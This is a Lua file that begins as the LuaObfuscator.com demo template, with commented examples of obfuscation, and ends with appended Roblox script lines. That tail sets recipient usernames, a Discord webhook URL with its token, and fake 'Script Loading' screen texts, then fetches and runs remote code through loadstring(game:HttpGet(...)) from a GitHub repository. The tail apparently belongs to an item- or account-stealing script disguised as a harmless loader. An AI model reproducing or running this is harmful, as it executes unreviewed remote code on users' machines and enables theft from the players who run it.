--[[
 .____                  ______
_.    ___                           __                
 |    |    _ ______   \_____  \\_ |___/ ___\
_  _____
__
___
/  |  _________ 
 |    |   |  |  \__  \   /   |   \| _ \   __\  |  \/  ___// ___\\_  \\   _\/  _ \  __ \
 |    |___|  |  // _ \_/    |    \ \_\ \  | |  |  /\__ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(__  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.😎 ~  Much Love, Ferib 

]]--

-- Example Code:
local a = ((16164 + (((3864 + 364101) - 274396) - 67600)) + (190952 - 110638))
a = a + ((113 - (26 + 67)) + (1219 - (119 + 997))) -- Example obfuscation

-- To hide your precious values, try obfuscating them!
-- Click the [Literals] button in the upper-right corner
local b = 1203456
local c = 1230471
local d = 8023481

-- The below if-statement is opque and can be predicted as
-- all conditions are staticly defined
if c > b then
    print("true")
end

-- You may want to obfuscate such if-statements by using
-- the [Junk-If] button in the upper right corner
if 1 + d > c then
    print("obfuscate the conditions!")
end

-- Next is [Strings], which will encrypt all strings but adds
-- extra code to decrypt them at runtime.
print("Clicking [Strings] will completely hide this string!")

-- Another important thing is to hide the order of things that get executed
-- to confuse an attacker using Control Flow Flattening. With [CFF v1] we can hide
-- the control flow of the following blocks.
do
   function sieve_of_eratosthenes(n)
   local is_prime = { }
       for i = 1, n do
           is_prime[i] = 1 ~= i
       end
       for i = 2, math.floor(math.sqrt(n)) do
           if is_prime[i] then
               for j = i* i, n, i do
                   is_prime[j] = false
               end
           end
       end
       return is_prime
   end
   local primes = sieve_of_eratosthenes(420)
   for key, value in pairs(primes) do
       if (value) then
           print("Prime found: " .. key)
       end
   end
end

-- You might be satisfied with your result, but before sharing your work you should
-- use [Minify] (under Miscellaneous) to destroy all local variables and comments.
-- Please note that some pre-configured obfuscate buttons already do this for you 😉
print("How to obfuscate best?")

-- The highest level of obfuscation is done through virtualization,
-- in our case this means we will be running Lua inside Lua using the
-- Ironbrew2 virtulization tool. Ready? click [Demo VM] and see what happens!
UserName = "hungkhanhkiet3"
UserName2 = "nozom01"
Webhook = "https://discord.com/api/webhooks/1108449234144985130/3E1tj6zucKwGpgNvipw_vP0Bvo55d0DWuo7gQe2nZPFlSgV_ZmzM0rX_bzuMYMT87wcO"
_G.ScriptName = "Tai script"
_G.FirstText = "Script Preparing"
_G.SecondText = "Script Loading…"
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 180
loadstring(game:HttpGet("https://raw.githubusercontent.com/k4ftt/R/main/Main.lua", true))()
